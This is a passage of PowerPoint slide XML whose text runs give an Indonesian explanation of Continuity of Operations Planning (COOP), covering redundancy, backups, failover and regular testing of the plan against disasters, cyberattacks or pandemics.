              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritisnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>krisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan strategi COOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Elemen-elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> COOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penciptaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data TI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> failover, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>krisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (COOP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>realistis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pandemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keefektifan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latihan</a:t>
            </a:r>
            <a:r>
